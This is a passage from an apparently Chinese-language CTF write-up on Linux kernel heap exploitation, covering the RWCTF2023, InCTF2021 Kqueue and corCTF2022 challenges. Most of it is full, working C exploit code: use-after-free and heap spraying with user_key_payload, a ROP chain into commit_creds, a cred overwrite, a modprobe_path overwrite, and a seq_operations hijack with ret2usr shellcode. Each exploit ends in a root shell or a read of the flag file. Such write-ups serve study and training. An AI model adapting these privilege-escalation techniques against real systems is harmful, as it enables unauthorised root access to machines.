return syscall(__NR_add_key, "user", description, payload, plen, KEY_SPEC_PROCESS_KEYRING);
}

int key_update(int id, void* payload, size_t plen){
return syscall(__NR_keyctl, KEYCTL_UPDATE, id, payload, plen, NULL);
}
int key_revoke(int id){
return syscall(__NR_keyctl, KEYCTL_REVOKE, id, NULL, NULL, NULL);
}
int key_read(int id, void* buffer, size_t buflen){
return syscall(__NR_keyctl, KEYCTL_READ, id, buffer, buflen, NULL);
}
int key_unlink(int id){
return syscall(__NR_keyctl, KEYCTL_UNLINK, id, KEY_SPEC_PROCESS_KEYRING, NULL, NULL);
}

void get_root(){
system("/bin/sh");
}

void main(){
bind_cpu(0);
saveStatus();
size_t* buf;
char description[0x50];
int key_id[KEY_SPRAY_NUM];
int victim_key_idx = -1, kernel_offset = -1, pipe_key_id;
int pipe_fd[2], pipe_key_ret;
size_t pipe_buffer_addr;

buf = malloc(sizeof(size_t)*0x4000);

rwctf_fd = open("/dev/rwctf", O_RDONLY);
if(rwctf_fd < 0){
error_log("/dev/rwctf had open failed!");
}

/*
* construct the UAF obj,we just alloc and then free it to the cpu->freelist
* */
info_log("Construct the UAF obj");
my_alloc(0, PIPE_NODE_INFO_SZ, buf);
my_delete(0);


/*
* the UAF obj always be used by allocating the pre_payload,then alloc new obj for user_key_payload
* so we could use the current cpu->freelist by heap sparying the user_key_payload
* then the current slab will put to the kmem_cache_node,then get a new slab for allocating
* finally, the UAF obj will be put into the kmem_cache_node
* ======================================================================================
* 1. use user_key_payload to full the cpu_freelist
* 2. then we will put the current slab to the node
* 3. during this time key_alloc, we finally will free the pre_payload, so we free the uaf obj in node
* 4. next time we alloc pre_payload will from other slab----current cpu->freelist
* 5. after that, we must to continue for sparying in order to full the current slab
* 6. when the current slab full, the node slab will be put on the cpu_freelist,and use UAF obj to alloc user_key_payload
* */
info_log("Starting sparying the user_key_payload");
for(int i = 0; i < KEY_SPRAY_NUM; i++){
snprintf(description, 0x50, "%s%d", "peiwithhao", i);
key_id[i] = key_alloc(description, buf, PIPE_NODE_INFO_SZ - 0x18); //0x18 is the user_key_payload head
if(key_id[i] < 0){
error_log("key alloc failed!");
}
}

//the UAF obj now be allocated as user_key_payload
my_delete(0);
//free the uaf obj, and allocate it again by second sparying,so we could modify the user_key_payload
//modify the buf,so we can overwrite the user_key_payload
info_log("Starting sparying the uaf obj");
buf[0] = 0;
buf[1] = 0;
buf[2] = 0x2000;
for(int i = 0;i < (KEY_SPRAY_NUM*2); i++){
my_alloc(0, PIPE_NODE_INFO_SZ, buf);
}
info_log("Sparying nearly four slab, it should be written!");

for(int i = 0; i < KEY_SPRAY_NUM; i++){
if(key_read(key_id[i], buf, 0x4000) > PIPE_NODE_INFO_SZ){
printf("[*]Found the victim key_idx : %d\n", i);
victim_key_idx = i;
}else{
key_revoke(key_id[i]); //then the user_key_payload's head->call_back_head will be put by user_free_payload_rcu()
}
}
if(victim_key_idx == -1){
error_log("Found the victim key_id failed:(");
}
info_log("victim key_id founded!");

/* find the rcu_head->callback_head */
for(int i = 0; i < 0x2000/8 ; i++){
if((buf[i]&0xfff) == 0x210){
kernel_offset = buf[i] - USER_FREE_PAYLOAD_RCU;
kernel_base += kernel_offset;
break;
}
}
if(kernel_offset == -1){
error_log("can not find the kernel offset");
}
PRINT_ADDR("Kernel_base", kernel_base);
PRINT_ADDR("Kernel_offset", kernel_offset);

/*
* Let the user_key_payload and pipe_inode_info belong to the same obj
*
* */
/* Construct the freelist 0->1 */
my_alloc(0, PIPE_NODE_INFO_SZ, buf);
my_alloc(1, PIPE_NODE_INFO_SZ, buf);
my_delete(1);
my_delete(0);
/* 1 object will be the user_key_payload */
pipe_key_id = key_alloc("peiwithhao", buf, PIPE_NODE_INFO_SZ - 0x18);
my_delete(1);
/* prepare for the pipe buffer */
my_alloc(0, PIPE_BUFFER_SZ, buf);
my_delete(0);
pipe(pipe_fd);

info_log("Starting control the process");
pipe_key_ret = key_read(pipe_key_id, buf, 0xffff);

pipe_buffer_addr = buf[16]; //leak the bufs
PRINT_ADDR("pipe_buffer addr", pipe_buffer_addr);
memset(buf, 'A',sizeof(buf));

/* ROP chain construct */
buf[0] = *(size_t*)"peiwhhao";
buf[1] = *(size_t*)"peiwithhao";
buf[2] = pipe_buffer_addr + 0x18;
buf[3] = POP_RBX_POP_RBP_POP_R12_RET + kernel_offset;
buf[4] = PUSH_RSI_POP_RSP_POP_RBX_POP_RBP_POP_R12_RET + kernel_offset; //release()
buf[5] = *(size_t*)"peiwhhao";
buf[6] = *(size_t*)"peiwhhao";
buf[7] = POP_RDI_RET + kernel_offset;
buf[8] = NULL;
buf[9] = prepare_kernel_cred + kernel_offset;
buf[10] = XCHG_RDI_RAX_DEC_RET + kernel_offset;
buf[11] = commit_creds + kernel_offset;
buf[12] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMDOE + kernel_offset + 0x31;
buf[13] = *(size_t*)"peiwhhao";
buf[14] = *(size_t*)"peiwhhao";
buf[15] = (size_t*)get_root;
buf[16] = user_cs;
buf[17] = user_rflags;
buf[18] = user_sp + 8;
buf[19] = user_ss;


my_delete(0);
my_alloc(0, PIPE_BUFFER_SZ, buf);

close(pipe_fd[0]);
close(pipe_fd[1]);
}

六、Kernel Heap - Arbitrary Write/Read

例题:RWCTF2023体验赛-Digging into kernel 2

1. 题目逆向

1
2
3
4
5
6
7
8
9
10
11
int __cdecl xkmod_init()
{
kmem_cache *v0; // rax

printk(&unk_1E4);
misc_register(&xkmod_device);
v0 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);
buf = 0LL;
s = v0;
return 0;
}

在模块初始化的时候注册了一个misc设备,然后构造一个属于自己的kmem_cache,但是由于他并没有设置其他额外的flags,所以由于kmalloc alias机制,会导致该kmem_cache会同我们内核当中的kmalloc-192一起复用,可能这并不是出题者的本意

漏洞点为关闭设备时执行的代码,存在UAF

1
2
3
4
int __fastcall xkmod_release(inode *inode, file *file)
{
return kmem_cache_free(s, buf);
}

2. easy mode

首先咱们就利用出题者的失误来打一个较为简单的kernel pwn,这里给出以下思路

  1. 首先打开多个漏洞设备,咱们设备中的buf都指向内核的bss段
  2. 然后我们关闭其中一个漏洞设备,但是其中在xkmod_release的过程当中并没有给我们的buf置空,造成了悬垂指针
  3. 此时buf指向的堆块处于freelist当中,此时若我们再次分配一个192大小的结构体,那么就会将其分配出去
  4. 我们选用大小刚刚适合的struct cred,然后我们利用ioctl系统调用当中的不同选项来将本进程的uid、gid什么的改0即可

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>

struct user_arg{
void *buffer;
int offset, size;
}data;


void alloc_kernelmem(int dev_fd){
ioctl(dev_fd, 0x1111111, &data);
}

void get_kernelmsg(int dev_fd){
ioctl(dev_fd, 0x7777777, &data);
}

void put_usermsg(int dev_fd){
ioctl(dev_fd, 0x6666666, &data);
}


void main(){
int dev_fd[2];
size_t buf[0x1000] = {0};
size_t length = 0x50;
data.buffer = malloc(0x100);
data.offset = 0;
data.size = 0x50;
for(int i = 0; i < 2; i++){
dev_fd[i] = open("/dev/xkmod", O_RDONLY);
}
printf("step1\n");
alloc_kernelmem(dev_fd[0]);
close(dev_fd[0]);
printf("step2:\n");
int pid = fork();
if(!pid){ //child process
get_kernelmsg(dev_fd[1]);
if(((int *)data.buffer)[3] == 0x3e8){
for(int i = 0; i < 10; i++){
((int *)data.buffer)[i] = 0;
}
put_usermsg(dev_fd[1]);
if(!getuid()){
puts("[+]Get Root Priviledge!");
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system("/bin/sh");
exit(0);
}
}
}
wait();
exit(1);
}

3. normal mode

我们在easy mode当中已经实现了UAFobj的读取,我们可以查看以下读取的UAF内容来查看改出题人构造的kmem_cache中offset的值,在测试的过程中我们可以看到一般读取的UAF块其中头8字节都是我们的一个kernel heap地址,因此我们可以推测其中每个空闲object的下一块链接指针在偏移为0处

而在学习arttnba3师傅的博客途中发现其中记录了两种内核配置的保护手段,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
config SLAB_FREELIST_RANDOM
bool "Randomize slab freelist"
depends on SLAB || SLUB
help
Randomizes the freelist order used on creating new pages. This
security feature reduces the predictability of the kernel slab
allocator against heap overflows.

config SLAB_FREELIST_HARDENED
bool "Harden slab freelist metadata"
depends on SLUB
help
Many kernel heap attacks try to target slab cache metadata and
other infrastructure. This options makes minor performance
sacrifices to harden the kernel slab allocator against common
freelist exploit methods.

其中第一种是在我们创建新的pages页面的时候其中会打乱我们freelist的顺序,也就是一开始是乱序的。

其二若是在kernel中配置了Y,那么就会在kmem_cache中添加一个额外的字段random_seq

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
* Slab cache management.
*/
struct kmem_cache {
...

#ifdef CONFIG_SLAB_FREELIST_RANDOM
unsigned int *random_seq;
#endif

...
struct kmem_cache_node *node[MAX_NUMNODES];
};

他的作用我感觉同glibc中safe unlink 类似,都是在指向下一个指针的地址异或上一个值,而这里的特殊值就是random_seq

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
/*
* Returns freelist pointer (ptr). With hardening, this is obfuscated
* with an XOR of the address where the pointer is held and a per-cache
* random number.
*/
static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
/*
* When CONFIG_KASAN_SW/HW_TAGS is enabled, ptr_addr might be tagged.
* Normally, this doesn't cause any issues, as both set_freepointer()
* and get_freepointer() are called with a pointer with the same tag.
* However, there are some issues with CONFIG_SLUB_DEBUG code. For
* example, when __free_slub() iterates over objects in a cache, it
* passes untagged pointers to check_object(). check_object() in turns
* calls get_freepointer() with an untagged pointer, which causes the
* freepointer to be restored incorrectly.
*/
return (void *)((unsigned long)ptr ^ s->random ^
swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
return ptr;
#endif
}

上面代码可以看到在获取freelist指针的时候会异或一个随机值跟本身的地址,在本题的测试当中看不出来异或的痕迹,

所以说判断题目中关于以上两个保护措施的配置为

1
2
CONFIG_SLAB_FREELIST_HARDENED = 'n'
CONFIG_SLAB_FREELIST_RANDOM = 'y'

且其中next指针在object中的偏移为0,

而因为我们知道了一个堆地址,所以我们可以推测一下kernel heap的堆起始地址,然后又因为KASLR的粒度为256MB在page_offset_base + 0x9d000的地址里存放着我们的一个内核函数secondary_startup_64的地址,而该函数对于内核基地址始终差0x30字节,因此我们也可以通过该值来检测我们的内核基地址猜测是否正确

知道内核基地址实际上我们就可以利用Arbitrary write来构成任意写,那么具体该写哪儿呢?

这里引入一种提权手法那就是覆写modeprobe_path,这里的地址可以通过一点小技巧来查看

1
2
3
4
/*
modprobe_path is set via /proc/sys.
*/
char modprobe_path[KMOD_PATH_LEN] = CONFIG_MODPROBE_PATH;

我们可以在root用户下查看/proc/sys/kernel/modprobe来查看其默认值,但一般都是/sbin/modprobe

1
2
/ # cat /proc/sys/kernel/modprobe   
/sbin/modprobe

那我们该如何找到modprobe_path的地址呢,我们通过源码可以看到,在调用__request_module函数的时候,

1
2
3
4
5
6
7
8
9
int __request_module(bool wait, const char *fmt, ...)
{
...

if (!modprobe_path[0])
return -ENOENT;

...
}

这里我们可以查看以下其中的汇编

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
ffffffff8108c690 <__request_module>:                                                                     
ffffffff8108c690: 55 push rbp
ffffffff8108c691: 48 89 e5 mov rbp,rsp
ffffffff8108c694: 41 56 push r14
ffffffff8108c696: 41 55 push r13
ffffffff8108c698: 41 54 push r12
ffffffff8108c69a: 49 89 f4 mov r12,rsi
ffffffff8108c69d: 41 52 push r10
ffffffff8108c69f: 4c 8d 55 10 lea r10,[rbp+0x10]
ffffffff8108c6a3: 53 push rbx
ffffffff8108c6a4: 4d 89 d5 mov r13,r10
ffffffff8108c6a7: 89 fb mov ebx,edi
ffffffff8108c6a9: 48 81 ec b0 00 00 00 sub rsp,0xb0
ffffffff8108c6b0: 48 89 55 b8 mov QWORD PTR [rbp-0x48],rdx
ffffffff8108c6b4: 48 89 4d c0 mov QWORD PTR [rbp-0x40],rcx
ffffffff8108c6b8: 4c 89 45 c8 mov QWORD PTR [rbp-0x38],r8
ffffffff8108c6bc: 4c 89 4d d0 mov QWORD PTR [rbp-0x30],r9
ffffffff8108c6c0: 65 48 8b 04 25 28 00 mov rax,QWORD PTR gs:0x28
ffffffff8108c6c7: 00 00
ffffffff8108c6c9: 48 89 45 a0 mov QWORD PTR [rbp-0x60],rax
ffffffff8108c6cd: 31 c0 xor eax,eax
ffffffff8108c6cf: 40 84 ff test dil,dil
ffffffff8108c6d2: 0f 85 80 01 00 00 jne ffffffff8108c858 <__request_module+0x1c8>
ffffffff8108c6d8: 80 3d 21 80 3b 01 00 cmp BYTE PTR [rip+0x13b8021],0x0 # ffffffff82444700

最底下只有那么一个cmp指令,因此我们可以断定他就是我们modprobe_path的值,因此我们只需要利用其中任意写的漏洞修改他为一个我们想要执行的文件即可,当然,拥有root权限

下面就是本次的利用情况

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>

#define HOME_PATH "/home/flag.sh"
char userful_shell[] = "#!/bin/sh\nchmod 777 /flag";

#define MODPROBE_PATH 0xffffffff82444700


struct user_arg{
size_t *buffer;
int offset, size;
}data;


void alloc_kernelmem(int dev_fd){
ioctl(dev_fd, 0x1111111, &data);
}

void get_kernelmsg(int dev_fd){
ioctl(dev_fd, 0x7777777, &data);
}

void put_usermsg(int dev_fd){
ioctl(dev_fd, 0x6666666, &data);
}


void main(){
int dev_fd[5];
data.offset = 0;
data.size = 0x50;
data.buffer = malloc(0x100);
size_t kernel_base, kernel_offset;

int fd = open(HOME_PATH, O_RDWR|O_CREAT);
write(fd, userful_shell, sizeof(userful_shell));
close(fd);
system("chmod +x /home/flag.sh");

size_t page_offset_base;

for(int i = 0; i < 5; i++){
dev_fd[i] = open("/dev/xkmod", O_RDONLY);
}

puts("[*]Step I:Construct the UAF obj...");
alloc_kernelmem(dev_fd[0]);
memset((char *)data.buffer, 0, 0x50);
put_usermsg(dev_fd[0]);
close(dev_fd[0]);

puts("[*]Step II:Leak the Kernel base");

get_kernelmsg(dev_fd[1]);
page_offset_base = data.buffer[0]&0xfffffffff0000000; //KASLR 256MB*n
printf("[+]Get the Guessing page_offset_base: 0x%lx\n", page_offset_base);
/* Checking for the correction */
data.buffer[0] = page_offset_base + 0x9d000 - 0x10;
put_usermsg(dev_fd[1]);
alloc_kernelmem(dev_fd[2]);
alloc_kernelmem(dev_fd[3]);
get_kernelmsg(dev_fd[1]);
if((data.buffer[2]&0xfff) != 0x030){
puts("Unfortunatlly!We guess the page_offset_base failed!");
exit(1);
}
kernel_base = data.buffer[2] - 0x30;
kernel_offset = kernel_base - 0xffffffff81000000;
printf("[+]Kernel_base :0x%lx\n", kernel_base);
printf("[+]Kernel_offset :0x%lx\n", kernel_offset);

puts("[+]Step III:Arbitrary write the modprobe_path...");
alloc_kernelmem(dev_fd[0]);
close(dev_fd[4]);
data.buffer[0] = MODPROBE_PATH + kernel_offset - 0x8;
/**/
put_usermsg(dev_fd[1]);
alloc_kernelmem(dev_fd[1]);
alloc_kernelmem(dev_fd[1]);
strcpy((char*)&(data.buffer[1]), "/home/flag.sh");
puts("[+]this is a debug...");
put_usermsg(dev_fd[1]);

puts("[+]Step IV:Handle the fake file...");

system("echo -e '\\xff\\xff\\xff\\xff' > /home/fake");
system("chmod +x /home/fake");
system("/home/fake");
}

七、Kernel Heap - Heap Overflow

例题:InCTF2021 - Kqueue

据arttnab3师傅据Scupxa0s师傅说说这是印度的强网杯:dog:,改题目有个坑点那就是权限存在着问题,当拿到题目解压文件系统时我们需要以root用户的权限来进行解压跟打包,不然就会出现kernel init error

1.题目逆向

题目运行脚本没开pti、smep、smap,所以我们可以采取ret2usr来做

首先分析漏洞模块,在这里大致分析一下,题目也是很贴心的给出了模块源码让我们分析

首先分析其中带的数据结构

1
2
3
4
5
6
7
8
9
10
11
12
13
typedef struct{                                                    
uint16_t data_size;
uint64_t queue_size; /* This needs to handle larger numbers */
uint32_t max_entries;
uint16_t idx;
char* data;
}queue;

struct queue_entry{
uint16_t idx;
char *data;
queue_entry *next;
};

其中通过名称大致可以判别他们的功能

在源码当中显示他们的结构如下:

且在模块中可以看到存在一个全局变量 kqueues[]数组,他是一个 queue *类型的数组

1
2
3
4
5
6
7
8
9
10
11
                                           
/* 此乃哥们的传入参数 */

typedef struct{
uint32_t max_entries;
uint16_t data_size;
uint16_t entry_idx;
uint16_t queue_idx;
char* data;
}request_t;

大致数据结构分析完毕,接下来着手分析其中漏

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/* Now you have the option to safely preserve your precious kqueues */                               
static noinline long save_kqueue_entries(request_t request){

...


/* copy all possible kqueue entries */
uint32_t i=0;
for(i=1;i<request.max_entries+1;i++){
if(!kqueue_entry || !kqueue_entry->data)
break;
if(kqueue_entry->data && request.data_size)
validate(memcpy(new_queue,kqueue_entry->data,request.data_size)); //vulnuribility
else
err("[-] Internal error");
kqueue_entry = kqueue_entry->next;
new_queue += queue->data_size;
}

/* Mark the queue as saved */
isSaved[request.queue_idx] = true;
return 0;
}

漏洞点出现在 save_kqueue_entries函数当中,在复制内容到new_queue的过程当中,这里并没有使用到它自身 queue->data_size ,我们可以任意输入 request.data_size来造成 kernel heap overflow,初步我们可以考虑堆喷一定的结构体来进行指针覆盖,

这里可以尝试使用msg_msg + seq_operations 来泄露内核地址,下面是初步的漏洞利用猜想,刚好借用了 CVE-2022-0185当中的思想:

  1. 首先堆喷一定的msg_msg,这里务必分配内容要为 0x1000 + sizeof(struct seq_operations) - sizeof(struct msg) - sizeof(struct msgseg),堆喷该特定的大小是为了下一步堆喷seq_operations做准备
  2. 分配特定大小的 kqueue,务必使得他能跟msg_msg分配的来源一致,例如都从 kmalloc-1k当中分配,这样就有几率使得我们的kqueue紧贴着堆喷到的某一个msg_msg结构体上
  3. 假设我们成功使他们相邻,我们就可以利用堆溢出来修改 msg_msg->m_ts,将其改大,然后我们尝试使用msg_rcv来读一下其中数据,如果说大于我们之前分配的值,那就说明该msg_msg就是 victim msg_msg
  4. 找到 victim msg_msg后,我们就可以利用其中的越界读了,此时我们可以再次大量堆喷 struct seq_operations,然后越界读其中的函数指针地址完成泄露
  5. 由于题目内核版本为5.8.1,因此仍可以采用userfaultfd,所以这里可以在send msg的过程中,当函数加载到 load_msg,可以利用条件竞争修改其中的next指针,使其完成任意写,这里可以写 modprobe_path

但是看了其他师傅的wp我发现我就是个:black_joker: :(

这里题目实际上还给了一个漏洞的利用,那就是整形的溢出,在我们创建queue结构体的时候,并没有对传入的request.max_entries进行检测,此时如果我们创建queue传入max_entries参数0xffffffff,这里的 space字段就变成了0

1
2
if(__builtin_umulll_overflow(sizeof(queue_entry),(request.max_entries+1),&space) == true)
err("[-] Integer overflow");

所以最终分配给queue的空间就只有 sizeof(struct queue),为0x20大小,因此可以想到使用 seq_operations结构体来进行利用

2.漏洞利用

整体流程十分简洁

  1. 首先是利用第一个点,我们在创建queue的时候传入 0xffffffff,这样最终可以创建一个只有queue的队列而不包含其中的 queue_entry
  2. 然后我们分配的data大小分配的是用来存放我们的shellcode指针的
  3. 我们此时利用第二个点那就是 save_kqueue_entries函数的堆溢出, 而由于我们的queue_size只有一个 struct queue结构体,而他的大小为0x20,因此我们大量堆喷 seq_operations结构体来构造相邻情况
  4. 此时当我们堆喷了大量的 seq_operations结构体后,假设刚好堆喷到了 new_queue的下一个结构体(实际上这有着极大概率出现该情况),此时我们就可以利用其中的堆溢出来将 seq_operations->start函数覆盖为我们的shellcode,然后下次读该 seq_operations所对应的fd指针时将会调用他
  5. 而由于有KASLR,我们还需要泄露出内核基地址,此时我们可以利用userland的pwn手法,也就是在栈上面寻找合适的地址,事实上我们也确实找到了一个稳定的内核地址,因此我们自己撰写shellcode然后调用 commit_creds(prepare_kernel_cred(NULL))即可

而题目中有个大坑,那就是在我开启的虚拟环境当中,正常最后调用 system("/bin/sh")会出现报错,起初是因为堆栈不平衡我倒是理解,但是之后我调整堆栈还是不行,在尝试的过程当中我发现他的终端是 -sh,这里不太明白,

图中可以看到我们确实重启了一个新的终端,并且既然运行到这里也说明它通过了我uid的检查,确实属于root用户,但是仍然不能查看其中的flag,感觉可能是他的文件系统init脚本中配置的问题(下面),可惜看到后面没看出甚么名堂,还是太菜了

1
2
3
4
5
6
7
8
9
# use the /dev/console device node from devtmpfs if possible to not      
# confuse glibc's ttyname_r().
# This may fail (E.G. booted with console=), and errors from exec will
# terminate the shell, so use a subshell for the test
if (exec 0</dev/console) 2>/dev/null; then
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
fi

最后直接取了个巧没有进行权限提升,直接打印的flag,如下:

题目exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>



struct user_request{
uint32_t max_entries;
uint16_t data_size;
uint16_t entry_idx;
uint16_t queue_idx;
char* data;
};

struct queue{
uint16_t data_size;
uint64_t queue_size; /* This needs to handle larger numbers */
uint32_t max_entries;
uint16_t idx;
char* data;

};

#define CREATE_KQUEUE 0xDEADC0DE
#define EDIT_KQUEUE 0xDAADEEEE
#define DELETE_KQUEUE 0xBADDCAFE
#define SAVE 0xB105BABE

int dev_fd;

size_t user_cs, user_ss,user_rflags,user_sp;

void saveStatus(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m Status has been saved . \033[0m");
}

size_t root_shell;
#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:%p\n", str, x)
void info_log(char* str){
printf("\033[0m\033[1m[+]%s\033[0m\n",str);
}

void error_log(char* str){
printf("\033[0m\033[1;31m%s\033[0m\n",str);
exit(1);
}


void get_root_shell(){
if(getuid()){
error_log("Failed to get root shell...");
}
info_log("I will get root shell...");
system("cat /flag");
info_log("You got my shell :)");
exit(0);
}

void create_kqueue(uint32_t maxentries, uint16_t datasize){
struct user_request request = {
.max_entries = maxentries,
.data_size = datasize,
};
ioctl(dev_fd, CREATE_KQUEUE, &request);
}

void edit_kqueue(uint16_t queue_idx, uint16_t entry_idx, char *data){
struct user_request request = {
.queue_idx = queue_idx,
.entry_idx = entry_idx,
.data = data,
};
ioctl(dev_fd, EDIT_KQUEUE, &request);
}

void delete_kqueue(uint16_t idx){
struct user_request request = {
.queue_idx = idx,
};
ioctl(dev_fd, DELETE_KQUEUE, &request);
}

void save_kqueue(uint16_t idx, uint32_t maxentries, uint16_t datasize){
struct user_request request = {
.queue_idx = idx,
.max_entries = maxentries,
.data_size = datasize,
};
ioctl(dev_fd, SAVE, &request);
}

size_t middle_rsp;
void shellcode(){
__asm__(
"mov r14, [rsp + 0x8];"
"sub r14, 0x201179;"
"mov r13, r14;"
"add r13, 0x8c580;"
"mov r12, r14;"
"add r12, 0x8c140;"
"mov rdi, 0;"
"call r13;"
"mov rdi, rax;"
"call r12;"
"swapgs;"
"mov r14, user_ss;"
"push r14;"
"mov r14, middle_rsp;"
"push r14;"
"mov r14, user_rflags;"
"push r14;"
"mov r14, user_cs;"
"push r14;"
"mov r14, root_shell;"
"push r14;"
"iretq;"
);
}


void main(){
saveStatus();

middle_rsp = user_sp + 0x8;
root_shell = (size_t)get_root_shell;
size_t data[0x20];
int seq_fd[0x200];
info_log("Step I:Create a queue without any queue_entry :)");
dev_fd = open("/dev/kqueue", O_RDONLY);
create_kqueue(0xffffffff, 0x20*8); //the queue->data include many shellcode ad


for(int i = 0; i < 0x20; i++){
data[i] = (size_t)shellcode;
}
edit_kqueue(0, 0, (char *)data);
info_log("Step II:Spraying the seq_operations!");
for(int i = 0; i < 0x200; i++){
seq_fd[i] = open("/proc/self/stat", O_RDONLY);
}
printf("the get shell addr is :0x%lx\n", (size_t)get_root_shell);
info_log("Step III:Overwrite 0x20 bytes...");
save_kqueue(0, 0, 0x40);
for(int i= 0; i < 0x200; i++){
read(seq_fd[i], data, 0x8);
}
}

八、Kernel Heap - Cross Cache Overflow

例题:corCTF2022-cache of castways

题目首先给出README,我们来康康,BitsByWill师傅给出了这样一段提示:

After repeated attacks on poor kernel objects, I’ve decided to place pwners in a special isolated place - a marooned region of memory. Good luck escaping out of here :^)

意思很明显,内核大师已经不满足于通用object的漏洞利用,直接告诉我们需要在一个隔离的环境完成利用,害怕 :^(

1. 题目逆向

官方wp中已经给出了完整的源码,我们就不需要模拟当时比赛的情景,直接聚焦于漏洞的利用当中,这里感谢BitsByWill师傅在题目当中同时提供了内核config和带有调试符号的内核映像,这为之后的学习省去了很多不必要的麻烦

首先查看启动脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/bin/sh

exec qemu-system-x86_64 \
-m 4096M \
-nographic \
-kernel bzImage \
-append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on" \
-netdev user,id=net \
-device e1000,netdev=net \
-no-reboot \
-monitor /dev/null \
-cpu qemu64,+smep,+smap \
-initrd initramfs.cpio.gz \

4G的内存,同时开启了smep、smap、kpti

实际上没必要查看,因为肯定保护全开orz

然后就是文件系统的初始化脚本,发现其中插入了我们需要分析的漏洞模块 cache_of_castway.ko

启动!我朝好帅

init_castaway_driver

首先来看init函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#define OVERFLOW_SZ 0x6

#define CHUNK_SIZE 512
#define MAX 8 * 50

struct castaway_cache
{
char buf[CHUNK_SIZE];
};

static int init_castaway_driver(void)
{
castaway_dev.minor = MISC_DYNAMIC_MINOR;
castaway_dev.name = DEVICE_NAME;
castaway_dev.fops = &castaway_fops;
castaway_dev.mode = 0644;
mutex_init(&castaway_lock);
if (misc_register(&castaway_dev))
{
return -1;
}
castaway_arr = kzalloc(MAX * sizeof(castaway_t *), GFP_KERNEL); //400个 castaway_t大小的数组
if (!castaway_arr)
{
return -1;
}
castaway_cachep = KMEM_CACHE(castaway_cache, SLAB_PANIC | SLAB_ACCOUNT); //出题者自行构造的隔离kmem_cache
if (!castaway_cachep)
{
return -1;
}
printk(KERN_INFO "All alone in an castaway cache... \n");
printk(KERN_INFO "There's no way a pwner can escape!\n");
return 0;
}

其中 KMEM_CACHE是一个创建 kmem_cache的宏,如下:

1
2
3
4
5
6
7
8
9
10
11
/*
* Please use this macro to create slab caches. Simply specify the
* name of the structure and maybe some flags that are listed above.
*
* The alignment of the struct determines object alignment. If you
* f.e. add ____cacheline_aligned_in_smp to the struct declaration
* then the objects will be properly aligned in SMP configurations.
*/
#define KMEM_CACHE(__struct, __flags) \
kmem_cache_create(#__struct, sizeof(struct __struct), \
__alignof__(struct __struct), (__flags), NULL)

kmem_cache的object大小为512字节,可以注意到创建 kmem_cache时带有 SLAB_ACCOUNT|SLAB_PANIC这个flag,我们查看内核地的配置发现 CONFIG_MEMCG_KMEM=y,因此通过该 kmem_cache创建的slab将会被归于一个单独的slab池当中,从而造成一个完全隔离的环境,而这里为了凸显这个 “完全”,同样的内核配置中 CONFIG_SLAB_MERGE_DEFUALT选项被禁止,以防通过使用 find_mergeable函数 来复用同样类似的标志以及大小的 kmem_cache

castaway_ioctl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
